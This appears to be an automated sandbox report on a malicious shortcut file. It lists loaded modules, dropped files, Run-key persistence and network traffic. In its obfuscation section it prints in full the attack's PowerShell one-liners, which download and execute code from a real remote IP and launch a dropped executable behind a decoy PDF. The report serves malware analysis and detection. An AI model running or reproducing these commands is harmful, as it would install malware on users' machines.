                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: k7rn7l32.dll
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: ntd3ll.dll
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: wkernel32.pdb source: 123123213123123321132.exe, 0000001A.00000003.2121502490.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121403543.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127876033.00000000055E0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127990404.0000000005700000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 123123213123123321132.exe, 0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121979217.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2128605040.0000000005800000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2128311163.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 123123213123123321132.exe, 0000001A.00000003.2120461385.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2120669592.00000000030C0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2125979573.00000000057D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2124888466.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 123123213123123321132.exe, 0000001A.00000003.2120966908.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121140629.0000000003070000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127543027.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127086812.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 123123213123123321132.exe, 0000001A.00000003.2120461385.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2120669592.00000000030C0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2125979573.00000000057D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2124888466.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 123123213123123321132.exe, 0000001A.00000003.2120966908.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121140629.0000000003070000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127543027.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127086812.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 123123213123123321132.exe, 0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121979217.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2128605040.0000000005800000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2128311163.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 123123213123123321132.exe, 0000001A.00000003.2121502490.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121403543.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127876033.00000000055E0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127990404.0000000005700000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004D7960
                      Source: 123123213123123321132.exe.5.drStatic PE information: real checksum: 0x241059 should be: 0x2a4026
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7F785E push eax; iretd 2_2_00007FFD9B7F786D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7F00AD pushad ; iretd 2_2_00007FFD9B7F00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7F782E pushad ; iretd 2_2_00007FFD9B7F785D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B7E00AD pushad ; iretd 5_2_00007FFD9B7E00C1
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004CA770 push eax; ret 19_2_004CA784
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004CA770 push eax; ret 19_2_004CA7AC
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AB86D push ebx; ret 26_3_007AB864
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AA840 push ebp; retf 26_3_007AA841
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AE83C pushad ; ret 26_3_007AE841
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AE80E push eax; iretd 26_3_007AE81D
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AA0F9 push FFFFFF82h; iretd 26_3_007AA0FB
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AD8A0 push 0000002Eh; iretd 26_3_007AD8A2
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007A8904 push ecx; ret 26_3_007A8917
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AB1DD push eax; ret 26_3_007AB1DF
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AE586 pushad ; retf 26_3_007AE599
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007A9F6A push eax; ret 26_3_007A9F75
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007AB70B push ebx; ret 26_3_007AB864
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_004381E0 push ecx; retf 26_2_004382AC
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_004381A0 push ecx; retf 26_2_004382AC
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_004CA770 push eax; ret 26_2_004CA784
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_004CA770 push eax; ret 26_2_004CA7AC
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_00434C60 push edi; retf 26_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_00434CF0 push edi; retf 26_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_00434C90 push edi; retf 26_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_00434CB0 push edi; retf 26_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_00447D60 push ecx; retf 26_2_00447E0D
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_2_00436DB0 push ecx; retf 26_2_00436EEF
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03224920 push 0000002Eh; iretd 27_3_03224922
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03225F0C push es; iretd 27_3_03225F0D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03221179 push FFFFFF82h; iretd 27_3_0322117B
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_0322278B push ebx; ret 27_3_032228E4

                      Persistence and Installation Behavior

                      barindex
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeFile created: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\readme.pdfJump to behavior

                      Boot Survival

                      barindex
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 18956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18956 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 18960
